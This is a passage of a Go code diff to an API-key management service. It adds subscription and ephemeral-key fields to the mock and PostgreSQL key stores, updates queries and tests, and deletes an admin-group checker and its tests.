Search( ctx context.Context, username string, @@ -47,8 +52,10 @@ type MetadataStore interface { Get(ctx context.Context, jti string) (*ApiKey, error) - // GetByHash looks up an API key by its SHA-256 hash (for Authorino validation) - // Returns ErrKeyNotFound if key doesn't exist, ErrInvalidKey if revoked + // GetByHash looks up an API key by its SHA-256 hash (for Authorino validation). + // Hash is computed as SHA-256(embedded_key_id + "\x00" + secret) where embedded_key_id + // is the per-key salt encoded in the API key format (sk-oai-{embedded_key_id}_{secret}). + // Returns ErrKeyNotFound if key doesn't exist, ErrInvalidKey if revoked or expired. GetByHash(ctx context.Context, keyHash string) (*ApiKey, error) // InvalidateAll marks all active tokens for a user as revoked. @@ -58,8 +65,8 @@ type MetadataStore interface { // Revoke marks a specific API key as revoked (status transition: active → revoked). Revoke(ctx context.Context, keyID string) error - // UpdateLastUsed updates the last_used_at timestamp for an API key - // Called after successful validation to track key usage + // UpdateLastUsed updates the last_used_at timestamp for an API key. + // Called after successful validation to track key usage. UpdateLastUsed(ctx context.Context, keyID string) error Close() error diff --git a/maas-api/internal/api_keys/store_mock.go b/maas-api/internal/api_keys/store_mock.go index 6f22761d7..6ca5f6767 100644 --- a/maas-api/internal/api_keys/store_mock.go +++ b/maas-api/internal/api_keys/store_mock.go @@ -23,6 +23,7 @@ type storedKey struct { keyHash string expiresAt time.Time lastUsedAt *time.Time + ephemeral bool } // NewMockStore creates a new in-memory mock store for testing. @@ -37,14 +38,20 @@ var _ MetadataStore = (*MockStore)(nil) // AddKey stores an API key with hash-only storage (no plaintext). // Keys can be permanent (expiresAt=nil) or expiring (expiresAt set). +// ephemeral marks the key as short-lived for programmatic use. 
// Note: keyPrefix is NOT stored (security - reduces brute-force attack surface). -func (m *MockStore) AddKey(ctx context.Context, username, keyID, keyHash, name, description string, userGroups []string, expiresAt *time.Time) error { +func (m *MockStore) AddKey( + ctx context.Context, username, keyID, keyHash, name, description string, userGroups []string, subscription string, expiresAt *time.Time, ephemeral bool, +) error { if keyID == "" { return ErrEmptyJTI } if name == "" { return ErrEmptyName } + if subscription == "" { + return errors.New("subscription is required") + } m.mu.Lock() defer m.mu.Unlock() @@ -60,13 +67,16 @@ func (m *MockStore) AddKey(ctx context.Context, username, keyID, keyHash, name, ID: keyID, Name: name, Description: description, + Subscription: subscription, Groups: userGroups, Status: StatusActive, CreationDate: time.Now().UTC().Format(time.RFC3339), + Ephemeral: ephemeral, }, username: username, keyHash: keyHash, expiresAt: expiresAtTime, + ephemeral: ephemeral, } return nil @@ -76,6 +86,7 @@ func (m *MockStore) AddKey(ctx context.Context, username, keyID, keyHash, name, // Pagination is mandatory - no unbounded queries allowed. // username can be empty (all users) or specific username. // statuses can filter by status - empty means all statuses. +// Note: Ephemeral keys are excluded by default (use Search with IncludeEphemeral for full control). 
func (m *MockStore) List(ctx context.Context, username string, params PaginationParams, statuses []string) (*PaginatedResult, error) { // Validate params (same as PostgresStore) if params.Limit < 1 || params.Limit > 100 { @@ -93,6 +104,11 @@ func (m *MockStore) List(ctx context.Context, username string, params Pagination now := time.Now().UTC() for _, k := range m.keys { + // Exclude ephemeral keys by default + if k.ephemeral { + continue + } + // Filter by username (empty = all users) if username != "" && k.username != username { continue @@ -148,11 +164,16 @@ func (m *MockStore) List(ctx context.Context, username string, params Pagination }, nil } -// filterKeys applies username and status filters to API keys. -func (m *MockStore) filterKeys(username string, statusFilters []string, now time.Time) []ApiKey { +// filterKeys applies username, status, and ephemeral filters to API keys. +func (m *MockStore) filterKeys(username string, statusFilters []string, includeEphemeral bool, now time.Time) []ApiKey { filtered := make([]ApiKey, 0, len(m.keys)) for _, k := range m.keys { + // Filter ephemeral keys unless explicitly included + if !includeEphemeral && k.ephemeral { + continue + } + // Filter by username if username != "" && k.username != username { continue @@ -287,6 +308,7 @@ func applyPagination(keys []ApiKey, offset, limit int) ([]ApiKey, bool) { } // Search implements flexible API key search with filtering, sorting, pagination. +// Ephemeral keys are excluded by default unless IncludeEphemeral filter is set to true. 
func (m *MockStore) Search( ctx context.Context, username string, @@ -305,9 +327,12 @@ func (m *MockStore) Search( m.mu.RLock() defer m.mu.RUnlock() - // Filter keys by username and status + // Determine if ephemeral keys should be included + includeEphemeral := filters.IncludeEphemeral != nil && *filters.IncludeEphemeral + + // Filter keys by username, status, and ephemeral now := time.Now().UTC() - allKeys := m.filterKeys(username, filters.Status, now) + allKeys := m.filterKeys(username, filters.Status, includeEphemeral, now) // Sort keys sort.Slice(allKeys, func(i, j int) bool { diff --git a/maas-api/internal/api_keys/store_postgres.go b/maas-api/internal/api_keys/store_postgres.go index 8ab6d4c80..5cb79de71 100644 --- a/maas-api/internal/api_keys/store_postgres.go +++ b/maas-api/internal/api_keys/store_postgres.go @@ -37,8 +37,17 @@ func NewPostgresStore(db *sql.DB, log *logger.Logger) *PostgresStore { // AddKey stores an API key with hash-only storage (no plaintext). // Keys can be permanent (expiresAt=nil) or expiring (expiresAt set). +// ephemeral marks the key as short-lived for programmatic use. +// +// Note on naming: keyID parameter is the database UUID/JTI (primary key), distinct from +// the embedded_key_id salt in the API key format. The keyHash is computed as +// SHA-256(embedded_key_id + "\x00" + secret), where embedded_key_id is encoded in the +// API key string (sk-oai-{embedded_key_id}_{secret}). +// // Note: keyPrefix is NOT stored (security - reduces brute-force attack surface). 
-func (s *PostgresStore) AddKey(ctx context.Context, username, keyID, keyHash, name, description string, userGroups []string, expiresAt *time.Time) error { +func (s *PostgresStore) AddKey( + ctx context.Context, username, keyID, keyHash, name, description string, userGroups []string, subscription string, expiresAt *time.Time, ephemeral bool, +) error { if keyID == "" { return ErrEmptyJTI } @@ -48,21 +57,24 @@ func (s *PostgresStore) AddKey(ctx context.Context, username, keyID, keyHash, na if keyHash == "" { return errors.New("key hash is required") } + if subscription == "" { + return errors.New("subscription is required") + } if userGroups == nil { userGroups = []string{} } query := ` - INSERT INTO api_keys (id, username, name, description, key_hash, user_groups, status, created_at, expires_at) - VALUES ($1, $2, $3, $4, $5, $6, 'active', $7, $8) + INSERT INTO api_keys (id, username, name, description, key_hash, user_groups, subscription, status, created_at, expires_at, ephemeral) + VALUES ($1, $2, $3, $4, $5, $6, $7, 'active', $8, $9, $10) ` // Use pq.Array to handle PostgreSQL TEXT[] type - _, err := s.db.ExecContext(ctx, query, keyID, username, name, description, keyHash, pq.Array(userGroups), time.Now().UTC(), expiresAt) + _, err := s.db.ExecContext(ctx, query, keyID, username, name, description, keyHash, pq.Array(userGroups), subscription, time.Now().UTC(), expiresAt, ephemeral) if err != nil { return fmt.Errorf("failed to insert API key: %w", err) } - s.logger.Debug("Stored API key", "id", keyID, "user", username) + s.logger.Debug("Stored API key", "id", keyID, "user", username, "ephemeral", ephemeral) return nil } @@ -71,6 +83,7 @@ func (s *PostgresStore) AddKey(ctx context.Context, username, keyID, keyHash, na // Fetches limit+1 items to efficiently determine if more pages exist. // username can be empty (admin viewing all users) or specific username. // statuses can filter by status (active, revoked, expired) - empty means all statuses. 
+// Note: Ephemeral keys are excluded by default (use Search with IncludeEphemeral for full control). func (s *PostgresStore) List(ctx context.Context, username string, params PaginationParams, statuses []string) (*PaginatedResult, error) { // Validate params if params.Limit < 1 || params.Limit > 100 { @@ -85,6 +98,9 @@ func (s *PostgresStore) List(ctx context.Context, username string, params Pagina var args []any argPos := 1 + // Exclude ephemeral keys by default + whereClauses = append(whereClauses, "ephemeral = FALSE") + if username != "" { whereClauses = append(whereClauses, fmt.Sprintf("username = $%d", argPos)) args = append(args, username) @@ -111,7 +127,7 @@ func (s *PostgresStore) List(ctx context.Context, username string, params Pagina //nolint:gosec // Dynamic WHERE clause is safe - uses parameterized queries query := fmt.Sprintf(` - SELECT id, name, description, created_at, expires_at, status, last_used_at + SELECT id, name, description, subscription, created_at, expires_at, status, last_used_at, ephemeral FROM api_keys %s ORDER BY created_at DESC @@ -133,7 +149,7 @@ func (s *PostgresStore) List(ctx context.Context, username string, params Pagina var expiresAt, lastUsedAt sql.NullTime var description sql.NullString - if err := rows.Scan(&k.ID, &k.Name, &description, &createdAt, &expiresAt, &k.Status, &lastUsedAt); err != nil { + if err := rows.Scan(&k.ID, &k.Name, &description, &k.Subscription, &createdAt, &expiresAt, &k.Status, &lastUsedAt, &k.Ephemeral); err != nil { return nil, fmt.Errorf("failed to scan row: %w", err) } @@ -169,6 +185,7 @@ func (s *PostgresStore) List(ctx context.Context, username string, params Pagina } // Search implements flexible API key search with filtering, sorting, pagination. +// Ephemeral keys are excluded by default unless IncludeEphemeral filter is set to true. 
func (s *PostgresStore) Search( ctx context.Context, username string, @@ -189,6 +206,11 @@ func (s *PostgresStore) Search( var args []any argPos := 1 + // Exclude ephemeral keys by default + if filters.IncludeEphemeral == nil || !*filters.IncludeEphemeral { + whereClauses = append(whereClauses, "ephemeral = FALSE") + } + // Filter by username if username != "" { whereClauses = append(whereClauses, fmt.Sprintf("username = $%d", argPos)) @@ -230,7 +252,7 @@ func (s *PostgresStore) Search( //nolint:gosec // Dynamic ORDER BY is safe - sort.By/Order validated against allowlist in handler query := fmt.Sprintf(` - SELECT id, name, description, created_at, expires_at, status, last_used_at + SELECT id, name, description, subscription, username, created_at, expires_at, status, last_used_at, ephemeral FROM api_keys %s %s @@ -256,10 +278,13 @@ func (s *PostgresStore) Search( &key.ID, &key.Name, &description, + &key.Subscription, + &key.Username, &createdAt, &expiresAt, &key.Status, &lastUsedAt, + &key.Ephemeral, ) if err != nil { return nil, fmt.Errorf("failed to scan API key: %w", err) @@ -301,7 +326,7 @@ func (s *PostgresStore) Search( // Get retrieves a single API key by ID. 
func (s *PostgresStore) Get(ctx context.Context, keyID string) (*ApiKey, error) { query := ` - SELECT id, name, description, username, created_at, expires_at, status, last_used_at + SELECT id, name, description, username, subscription, created_at, expires_at, status, last_used_at, ephemeral FROM api_keys WHERE id = $1 ` @@ -312,7 +337,7 @@ func (s *PostgresStore) Get(ctx context.Context, keyID string) (*ApiKey, error) var expiresAt, lastUsedAt sql.NullTime var description sql.NullString - if err := row.Scan(&k.ID, &k.Name, &description, &k.Username, &createdAt, &expiresAt, &k.Status, &lastUsedAt); err != nil { + if err := row.Scan(&k.ID, &k.Name, &description, &k.Username, &k.Subscription, &createdAt, &expiresAt, &k.Status, &lastUsedAt, &k.Ephemeral); err != nil { if err == sql.ErrNoRows { return nil, ErrKeyNotFound } @@ -336,7 +361,7 @@ func (s *PostgresStore) Get(ctx context.Context, keyID string) (*ApiKey, error) // GetByHash looks up an API key by its SHA-256 hash (critical path for validation). 
func (s *PostgresStore) GetByHash(ctx context.Context, keyHash string) (*ApiKey, error) { query := ` - SELECT id, username, name, description, user_groups, status, expires_at, last_used_at + SELECT id, username, name, description, user_groups, subscription, status, expires_at, last_used_at, ephemeral FROM api_keys WHERE key_hash = $1 ` @@ -348,7 +373,7 @@ func (s *PostgresStore) GetByHash(ctx context.Context, keyHash string) (*ApiKey, var userGroups []string // Use pq.Array to scan PostgreSQL TEXT[] into []string - if err := row.Scan(&k.ID, &k.Username, &k.Name, &description, pq.Array(&userGroups), &k.Status, &expiresAt, &lastUsedAt); err != nil { + if err := row.Scan(&k.ID, &k.Username, &k.Name, &description, pq.Array(&userGroups), &k.Subscription, &k.Status, &expiresAt, &lastUsedAt, &k.Ephemeral); err != nil { if err == sql.ErrNoRows { return nil, ErrKeyNotFound } diff --git a/maas-api/internal/api_keys/store_test.go b/maas-api/internal/api_keys/store_test.go index b2f1dc677..23270a255 100644 --- a/maas-api/internal/api_keys/store_test.go +++ b/maas-api/internal/api_keys/store_test.go @@ -2,7 +2,6 @@ package api_keys_test import ( "context" - "fmt" "testing" "github.com/stretchr/testify/assert" @@ -65,16 +64,13 @@ func TestAPIKeyOperations(t *testing.T) { defer store.Close() t.Run("AddKey", func(t *testing.T) { - err := store.AddKey(ctx, "user1", "key-id-1", "hash123", "my-key", "test key", []string{"system:authenticated", "premium-user"}, nil) + err := store.AddKey(ctx, "user1", "key-id-1", "hash123", "my-key", "test key", []string{"system:authenticated", "premium-user"}, "sub-1", nil, false) require.NoError(t, err) - params := api_keys.PaginationParams{Limit: 10, Offset: 0} - result, err := store.List(ctx, "user1", params, nil) + // Verify key was added by fetching it + key, err := store.Get(ctx, "key-id-1") require.NoError(t, err) - assert.Len(t, result.Keys, 1) - assert.Equal(t, "my-key", result.Keys[0].Name) - // KeyPrefix is NOT stored (security - reduces 
brute-force attack surface) - assert.False(t, result.HasMore) + assert.Equal(t, "my-key", key.Name) }) t.Run("GetByHash", func(t *testing.T) { @@ -101,7 +97,7 @@ func TestAPIKeyOperations(t *testing.T) { t.Run("UpdateLastUsed", func(t *testing.T) { // Add another key for this test - err := store.AddKey(ctx, "user2", "key-id-2", "hash456", "key2", "", []string{"system:authenticated", "free-user"}, nil) + err := store.AddKey(ctx, "user2", "key-id-2", "hash456", "key2", "", []string{"system:authenticated", "free-user"}, "sub-2", nil, false) require.NoError(t, err) err = store.UpdateLastUsed(ctx, "key-id-2") @@ -113,246 +109,3 @@ func TestAPIKeyOperations(t *testing.T) { }) } -func TestList(t *testing.T) { - ctx := t.Context() - store := createTestStore(t) - defer store.Close() - - // Create 125 test keys to test pagination - const totalKeys = 125 - username := "paginated-user" - - for i := 1; i <= totalKeys; i++ { - keyID := fmt.Sprintf("key-%d", i) - keyHash := fmt.Sprintf("hash-%d", i) - name := fmt.Sprintf("Key %d", i) - err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, nil) - require.NoError(t, err) - } - - t.Run("FirstPage", func(t *testing.T) { - params := api_keys.PaginationParams{Limit: 50, Offset: 0} - result, err := store.List(ctx, username, params, nil) - require.NoError(t, err) - assert.Len(t, result.Keys, 50, "should return exactly 50 keys") - assert.True(t, result.HasMore, "should indicate more pages exist") - }) - - t.Run("LastPage", func(t *testing.T) { - params := api_keys.PaginationParams{Limit: 50, Offset: 100} - result, err := store.List(ctx, username, params, nil) - require.NoError(t, err) - assert.Len(t, result.Keys, 25, "should return remaining 25 keys") - assert.False(t, result.HasMore, "should indicate no more pages") - }) - - t.Run("ValidationErrors", func(t *testing.T) { - t.Run("NegativeLimit", func(t *testing.T) { - params := api_keys.PaginationParams{Limit: 0, Offset: 0} - _, err := 
store.List(ctx, username, params, nil) - require.Error(t, err) - assert.Contains(t, err.Error(), "limit must be between 1 and 100") - }) - }) -} - -func TestEmptyUsernameReturnsAllUsers(t *testing.T) { - ctx := t.Context() - store := createTestStore(t) - defer store.Close() - - // Create 3 keys for alice - for i := 1; i <= 3; i++ { - keyID := fmt.Sprintf("alice-key-%d", i) - keyHash := fmt.Sprintf("alice-hash-%d", i) - name := fmt.Sprintf("Alice Key %d", i) - err := store.AddKey(ctx, "alice", keyID, keyHash, name, "", []string{"system:authenticated"}, nil) - require.NoError(t, err) - } - - // Create 2 keys for bob - for i := 1; i <= 2; i++ { - keyID := fmt.Sprintf("bob-key-%d", i) - keyHash := fmt.Sprintf("bob-hash-%d", i) - name := fmt.Sprintf("Bob Key %d", i) - err := store.AddKey(ctx, "bob", keyID, keyHash, name, "", []string{"system:authenticated"}, nil) - require.NoError(t, err) - } - - // List with empty username should return all keys - params := api_keys.PaginationParams{Limit: 100, Offset: 0} - result, err := store.List(ctx, "", params, nil) - require.NoError(t, err) - assert.Len(t, result.Keys, 5, "should return all 5 keys from both users") - - // Verify we have keys from both users - usernames := make(map[string]int) - for _, key := range result.Keys { - usernames[key.Username]++ - } - assert.Equal(t, 3, usernames["alice"], "should have 3 keys from alice") - assert.Equal(t, 2, usernames["bob"], "should have 2 keys from bob") -} - -func TestFilterByStatus(t *testing.T) { - ctx := t.Context() - store := createTestStore(t) - defer store.Close() - - // Create 3 active keys - for i := 1; i <= 3; i++ { - keyID := fmt.Sprintf("active-key-%d", i) - keyHash := fmt.Sprintf("active-hash-%d", i) - name := fmt.Sprintf("Active Key %d", i) - err := store.AddKey(ctx, "testuser", keyID, keyHash, name, "", []string{"system:authenticated"}, nil) - require.NoError(t, err) - } - - // Create 2 revoked keys - for i := 1; i <= 2; i++ { - keyID := fmt.Sprintf("revoked-key-%d", 
i) - keyHash := fmt.Sprintf("revoked-hash-%d", i) - name := fmt.Sprintf("Revoked Key %d", i) - err := store.AddKey(ctx, "testuser", keyID, keyHash, name, "", []string{"system:authenticated"}, nil) - require.NoError(t, err) - err = store.Revoke(ctx, keyID) - require.NoError(t, err) - } - - params := api_keys.PaginationParams{Limit: 100, Offset: 0} - - t.Run("ActiveOnly", func(t *testing.T) { - result, err := store.List(ctx, "testuser", params, []string{"active"}) - require.NoError(t, err) - assert.Len(t, result.Keys, 3, "should return 3 active keys") - for _, key := range result.Keys { - assert.Equal(t, api_keys.StatusActive, key.Status) - } - }) - - t.Run("RevokedOnly", func(t *testing.T) { - result, err := store.List(ctx, "testuser", params, []string{"revoked"}) - require.NoError(t, err) - assert.Len(t, result.Keys, 2, "should return 2 revoked keys") - for _, key := range result.Keys { - assert.Equal(t, api_keys.StatusRevoked, key.Status) - } - }) -} - -func TestFilterByMultipleStatuses(t *testing.T) { - ctx := t.Context() - store := createTestStore(t) - defer store.Close() - - // Create 2 active keys - for i := 1; i <= 2; i++ { - keyID := fmt.Sprintf("active-key-%d", i) - keyHash := fmt.Sprintf("active-hash-%d", i) - name := fmt.Sprintf("Active Key %d", i) - err := store.AddKey(ctx, "testuser", keyID, keyHash, name, "", []string{"system:authenticated"}, nil) - require.NoError(t, err) - } - - // Create 1 revoked key - keyID := "revoked-key" - keyHash := "revoked-hash" - err := store.AddKey(ctx, "testuser", keyID, keyHash, "Revoked Key", "", []string{"system:authenticated"}, nil) - require.NoError(t, err) - err = store.Revoke(ctx, keyID) - require.NoError(t, err) - - // Create 1 expired key (using past expiration) - // Note: MockStore might not support expiration - this is a conceptual test - // If expiration is not supported, this test will verify the filter logic works - - params := api_keys.PaginationParams{Limit: 100, Offset: 0} - result, err := store.List(ctx, 
"testuser", params, []string{"active", "revoked"}) - require.NoError(t, err) - - // Should return active + revoked keys (3 total) - assert.Len(t, result.Keys, 3, "should return 2 active + 1 revoked = 3 keys") - - // Verify we have both statuses - statuses := make(map[string]int) - for _, key := range result.Keys { - statuses[string(key.Status)]++ - } - assert.Equal(t, 2, statuses["active"], "should have 2 active keys") - assert.Equal(t, 1, statuses["revoked"], "should have 1 revoked key") -} - -func TestFilterByUsernameAndStatus(t *testing.T) { - ctx := t.Context() - store := createTestStore(t) - defer store.Close() - - // alice: 2 active, 1 revoked - for i := 1; i <= 2; i++ { - keyID := fmt.Sprintf("alice-active-%d", i) - keyHash := fmt.Sprintf("alice-hash-active-%d", i) - name := fmt.Sprintf("Alice Active Key %d", i) - err := store.AddKey(ctx, "alice", keyID, keyHash, name, "", []string{"system:authenticated"}, nil) - require.NoError(t, err) - } - keyID := "alice-revoked" - keyHash := "alice-hash-revoked" - err := store.AddKey(ctx, "alice", keyID, keyHash, "Alice Revoked Key", "", []string{"system:authenticated"}, nil) - require.NoError(t, err) - err = store.Revoke(ctx, keyID) - require.NoError(t, err) - - // bob: 1 active, 2 revoked - keyID = "bob-active" - keyHash = "bob-hash-active" - err = store.AddKey(ctx, "bob", keyID, keyHash, "Bob Active Key", "", []string{"system:authenticated"}, nil) - require.NoError(t, err) - - for i := 1; i <= 2; i++ { - keyID = fmt.Sprintf("bob-revoked-%d", i) - keyHash = fmt.Sprintf("bob-hash-revoked-%d", i) - name := fmt.Sprintf("Bob Revoked Key %d", i) - err = store.AddKey(ctx, "bob", keyID, keyHash, name, "", []string{"system:authenticated"}, nil) - require.NoError(t, err) - err = store.Revoke(ctx, keyID) - require.NoError(t, err) - } - - params := api_keys.PaginationParams{Limit: 100, Offset: 0} - - t.Run("AliceActive", func(t *testing.T) { - result, err := store.List(ctx, "alice", params, []string{"active"}) - 
require.NoError(t, err) - assert.Len(t, result.Keys, 2, "alice should have 2 active keys") - for _, key := range result.Keys { - assert.Equal(t, "alice", key.Username) - assert.Equal(t, api_keys.StatusActive, key.Status) - } - }) - - t.Run("AliceRevoked", func(t *testing.T) { - result, err := store.List(ctx, "alice", params, []string{"revoked"}) - require.NoError(t, err) - assert.Len(t, result.Keys, 1, "alice should have 1 revoked key") - assert.Equal(t, "alice", result.Keys[0].Username) - assert.Equal(t, api_keys.StatusRevoked, result.Keys[0].Status) - }) - - t.Run("BobActive", func(t *testing.T) { - result, err := store.List(ctx, "bob", params, []string{"active"}) - require.NoError(t, err) - assert.Len(t, result.Keys, 1, "bob should have 1 active key") - assert.Equal(t, "bob", result.Keys[0].Username) - assert.Equal(t, api_keys.StatusActive, result.Keys[0].Status) - }) - - t.Run("BobRevoked", func(t *testing.T) { - result, err := store.List(ctx, "bob", params, []string{"revoked"}) - require.NoError(t, err) - assert.Len(t, result.Keys, 2, "bob should have 2 revoked keys") - for _, key := range result.Keys { - assert.Equal(t, "bob", key.Username) - assert.Equal(t, api_keys.StatusRevoked, key.Status) - } - }) -} diff --git a/maas-api/internal/api_keys/types.go b/maas-api/internal/api_keys/types.go index 163d0fe36..3a9fb0987 100644 --- a/maas-api/internal/api_keys/types.go +++ b/maas-api/internal/api_keys/types.go @@ -24,21 +24,24 @@ type ApiKey struct { Name string `json:"name"` Description string `json:"description,omitempty"` Username string `json:"username,omitempty"` + Subscription string `json:"subscription,omitempty"` // MaaSSubscription name bound at mint time Groups []string `json:"groups,omitempty"` // User's groups at creation (immutable snapshot for authorization) CreationDate string `json:"creationDate"` ExpirationDate string `json:"expirationDate,omitempty"` // Empty for permanent keys Status Status `json:"status"` // "active", "expired", "revoked" 
LastUsedAt string `json:"lastUsedAt,omitempty"` // Tracks when key was last used for validation + Ephemeral bool `json:"ephemeral"` // Short-lived programmatic key } // ValidationResult holds the result of API key validation (for Authorino HTTP callback). type ValidationResult struct { - Valid bool `json:"valid"` - UserID string `json:"userId,omitempty"` - Username string `json:"username,omitempty"` - KeyID string `json:"keyId,omitempty"` - Groups []string `json:"groups,omitempty"` // User groups for subscription-based authorization - Reason string `json:"reason,omitempty"` // If invalid: "key not found", "revoked", etc. + Valid bool `json:"valid"` + UserID string `json:"userId,omitempty"` + Username string `json:"username,omitempty"` + KeyID string `json:"keyId,omitempty"` + Groups []string `json:"groups,omitempty"` // User groups for subscription-based authorization + Subscription string `json:"subscription,omitempty"` // MaaSSubscription name from DB (Authorino → subscription-info) + Reason string `json:"reason,omitempty"` // If invalid: "key not found", "revoked", etc. } // PaginationParams holds pagination parameters. @@ -53,13 +56,6 @@ type PaginatedResult struct { HasMore bool } -// ListAPIKeysResponse is the HTTP response for GET /v1/api-keys. 
-type ListAPIKeysResponse struct { - Object string `json:"object"` // Always "list" - Data []ApiKey `json:"data"` - HasMore bool `json:"has_more"` -} - // ============================================================ // SEARCH REQUEST/RESPONSE TYPES // ============================================================ @@ -91,6 +87,9 @@ type SearchFilters struct { // Phase 4: Boolean filters (future) HasExpiration *bool `json:"hasExpiration,omitempty"` // true = expiring, false = permanent HasBeenUsed *bool `json:"hasBeenUsed,omitempty"` // true = used, false = never used + + // Ephemeral key filter + IncludeEphemeral *bool `json:"includeEphemeral,omitempty"` // Include ephemeral keys in results (default: false) } // SortParams specifies sorting criteria. diff --git a/maas-api/internal/auth/admin_checker.go b/maas-api/internal/auth/admin_checker.go deleted file mode 100644 index d9f67f1e1..000000000 --- a/maas-api/internal/auth/admin_checker.go +++ /dev/null @@ -1,71 +0,0 @@ -package auth - -import ( - "errors" - "fmt" - "slices" - - "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" - "k8s.io/client-go/tools/cache" -) - -// AdminChecker checks if a user is an admin based on Auth CR from OpenDataHub operator. -// The Auth CR is a cluster-scoped singleton named "auth" from services.opendatahub.io/v1alpha1. -type AdminChecker struct { - authLister cache.GenericLister -} - -// NewAdminChecker creates a new AdminChecker that queries the Auth CR. -func NewAdminChecker(authLister cache.GenericLister) *AdminChecker { - return &AdminChecker{ - authLister: authLister, - } -} - -// IsAdmin checks if any of the user's groups match the admin groups defined in the Auth CR. -// Returns true if the user belongs to at least one admin group, false otherwise. -// If the Auth CR doesn't exist or can't be read, returns false (fail-closed). 
-func (a *AdminChecker) IsAdmin(userGroups []string) bool { - adminGroups, err := a.GetAdminGroups() - if err != nil { - // Fail-closed: if we can't determine admin groups, deny admin access - return false - } - - // Check if any user group matches admin groups - for _, userGroup := range userGroups { - if slices.Contains(adminGroups, userGroup) { - return true - } - } - - return false -} - -// GetAdminGroups fetches the admin groups from the Auth CR. -// The Auth CR is cluster-scoped and must be named "auth". -// Returns empty slice and error if Auth CR doesn't exist or has invalid format. -func (a *AdminChecker) GetAdminGroups() ([]string, error) { - // Auth CR is cluster-scoped, so we get it directly by name - obj, err := a.authLister.Get("auth") - if err != nil { - return nil, fmt.Errorf("failed to get Auth CR: %w", err) - } - - // Convert to unstructured to access fields - u, ok := obj.(*unstructured.Unstructured) - if !ok { - return nil, fmt.Errorf("unexpected type for Auth CR: %T", obj) - } - - // Extract spec.adminGroups field - adminGroups, found, err := unstructured.NestedStringSlice(u.Object, "spec", "adminGroups") - if err != nil { - return nil, fmt.Errorf("failed to parse adminGroups from Auth CR: %w", err) - } - if !found { - return nil, errors.New("adminGroups field not found in Auth CR spec") - } - - return adminGroups, nil -} diff --git a/maas-api/internal/auth/admin_checker_test.go b/maas-api/internal/auth/admin_checker_test.go deleted file mode 100644 index 295ea5e1b..000000000 --- a/maas-api/internal/auth/admin_checker_test.go +++ /dev/null @@ -1,164 +0,0 @@ -package auth_test - -import ( - "errors" - "testing" - - "github.com/stretchr/testify/assert" - "github.com/stretchr/testify/require" - "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" - "k8s.io/apimachinery/pkg/labels" - "k8s.io/apimachinery/pkg/runtime" - "k8s.io/client-go/tools/cache" - - "github.com/opendatahub-io/models-as-a-service/maas-api/internal/auth" -) - -var 
errAuthCRNotFound = errors.New("auth CR not found") - -// mockAuthLister implements cache.GenericLister for testing. -type mockAuthLister struct { - authCR *unstructured.Unstructured - err error -} - -func (m *mockAuthLister) List(selector labels.Selector) ([]runtime.Object, error) { - return nil, nil -} - -func (m *mockAuthLister) Get(name string) (runtime.Object, error) { - if m.err != nil { - return nil, m.err - } - return m.authCR, nil -} - -func (m *mockAuthLister) ByNamespace(namespace string) cache.GenericNamespaceLister { - return nil -} - -// createAuthCR creates a mock Auth CR with the given admin groups. -func createAuthCR(adminGroups []string) *unstructured.Unstructured { - // Convert []string to []interface{} for unstructured.NestedStringSlice() to work correctly - adminGroupsInterface := make([]any, len(adminGroups)) - for i, g := range adminGroups { - adminGroupsInterface[i] = g - } - - return &unstructured.Unstructured{ - Object: map[string]any{ - "apiVersion": "services.opendatahub.io/v1alpha1", - "kind": "Auth", - "metadata": map[string]any{ - "name": "auth", - }, - "spec": map[string]any{ - "adminGroups": adminGroupsInterface, - }, - }, - } -} - -func TestIsAdmin(t *testing.T) { - t.Run("UserInAdminGroup", func(t *testing.T) { - authCR := createAuthCR([]string{"admin-group", "super-admins"}) - lister := &mockAuthLister{authCR: authCR} - checker := auth.NewAdminChecker(lister) - - userGroups := []string{"users", "admin-group"} - assert.True(t, checker.IsAdmin(userGroups), "user with admin-group should be admin") - }) - - t.Run("UserNotInAdminGroup", func(t *testing.T) { - authCR := createAuthCR([]string{"admin-group", "super-admins"}) - lister := &mockAuthLister{authCR: authCR} - checker := auth.NewAdminChecker(lister) - - userGroups := []string{"users", "developers"} - assert.False(t, checker.IsAdmin(userGroups), "user without admin groups should not be admin") - }) - - t.Run("AuthCRNotFound", func(t *testing.T) { - lister := &mockAuthLister{err: 
errAuthCRNotFound} - checker := auth.NewAdminChecker(lister) - - userGroups := []string{"users", "admin-group"} - assert.False(t, checker.IsAdmin(userGroups), "should fail-closed when Auth CR not found") - }) - - t.Run("MultipleAdminGroups", func(t *testing.T) { - authCR := createAuthCR([]string{"admin-group-1", "admin-group-2", "admin-group-3"}) - lister := &mockAuthLister{authCR: authCR} - checker := auth.NewAdminChecker(lister) - - t.Run("MatchesFirst", func(t *testing.T) { - userGroups := []string{"admin-group-1", "users"} - assert.True(t, checker.IsAdmin(userGroups)) - }) - - t.Run("MatchesMiddle", func(t *testing.T) { - userGroups := []string{"users", "admin-group-2"} - assert.True(t, checker.IsAdmin(userGroups)) - }) - - t.Run("MatchesLast", func(t *testing.T) { - userGroups := []string{"users", "admin-group-3"} - assert.True(t, checker.IsAdmin(userGroups)) - }) - }) -} - -func TestGetAdminGroups(t *testing.T) { - t.Run("Success", func(t *testing.T) { - expectedGroups := []string{"admin-group", "super-admins"} - authCR := createAuthCR(expectedGroups) - lister := &mockAuthLister{authCR: authCR} - checker := auth.NewAdminChecker(lister) - - groups, err := checker.GetAdminGroups() - require.NoError(t, err) - assert.Equal(t, expectedGroups, groups) - }) - - t.Run("AuthCRNotFound", func(t *testing.T) { - lister := &mockAuthLister{err: errAuthCRNotFound} - checker := auth.NewAdminChecker(lister) - - groups, err := checker.GetAdminGroups() - require.Error(t, err) - assert.Nil(t, groups) - assert.Contains(t, err.Error(), "failed to get Auth CR") - }) - - t.Run("MissingAdminGroupsField", func(t *testing.T) { - authCR := &unstructured.Unstructured{ - Object: map[string]any{ - "apiVersion": "services.opendatahub.io/v1alpha1", - "kind": "Auth", - "metadata": map[string]any{ - "name": "auth", - }, - "spec": map[string]any{ - // No adminGroups field - }, - }, - } - lister := &mockAuthLister{authCR: authCR} - checker := auth.NewAdminChecker(lister) - - groups, err := 
